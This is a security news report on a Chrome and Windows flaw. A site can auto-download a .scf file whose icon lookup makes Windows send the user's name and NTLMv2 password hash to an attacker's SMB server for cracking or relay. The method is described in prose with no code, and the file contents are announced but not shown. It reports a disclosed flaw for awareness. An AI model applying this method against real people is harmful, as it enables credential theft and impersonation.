A Google Chrome vulnerability allows hackers to steal people’s Windows login credentials and launch SMB (Server Message Block) relay attacks, according to security experts. The attack technique that can allow credential theft is a combination of two different techniques, one of which was borrowed from the Stuxnet campaign and the other from a technique demonstrated at a Black Hat conference by two security researchers.
he Google Chrome vulnerability was uncovered by DefenceCode security engineer Bosko Stankovic, who said in a blog that he found the flaw in a default configuration of Chrome running on Windows 10.
“Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his web site to be able to proceed and reuse victim’s authentication credentials,” Stankovic said.
He added that this vulnerability poses a threat not just to privileged users such as administrators but also to regular users and organisations since it “it enables the attacker to impersonate members of the organisation”. Hackers can also “immediately reuse” stolen credentials and privileges gained to launch further attacks “on other users or gain access and control of IT resources”.
DefenceCode said it had not informed Google about the vulnerability. However, Google told Threatpost that it was aware of the issue and “taking necessary action.”
According to Stankovic, the attack is simple and involves victims being tricked into clicking on a malicious link, which triggers an automatic download a Windows Explorer Shell Command File or SCF file. The SCF file lies dormant until the victim opens the download directory folder, after which it attempts to exfiltrate data linked with a Windows icon located on the hacker’s server. This in turn provides the attacker with the victim’s username and hashed password.
Threatpost cited independent security researchers as having noted that this flaw is not exclusively tied to how Chrome deals SCF files, rather it also relates to how Windows handles SCF files.
“Organisations that allow remote access to services such as Microsoft Exchange (Outlook Anywhere) and use NTLM as authentication method, may be vulnerable to SMB relay attacks, allowing the attacker to impersonate the victim, accessing data and systems without having to crack the password,” Stankovic warned.
.SCF file + SMB Protocol + Google Chrome
One such file type is Windows Explorer Shell Command File (.scf files). It supports some Windows Explorer commands like showing desktop or opening a Windows Explorer window. A .scf file, if stored on disk, retrieves an icon file when it’s loaded in a Windows Explorer window.
A .scf file can be used to trick Windows into authenticating a remote SMB server. This is how the contents of file will look like:
After a user downloads the file on system, it’s triggered as soon as download folder is opened to view the file. Please note that one doesn’t need to click/open this file; Windows File Explorer automatically attempts to load the icon.
The rest of the work is done by the remote SMB server which is set up by some notorious force. The server is ready to capture user’s username and NTLMv2 password hash, which can be cracked offline. The server can also be configured to relay this connection to some external service that needs such credentials.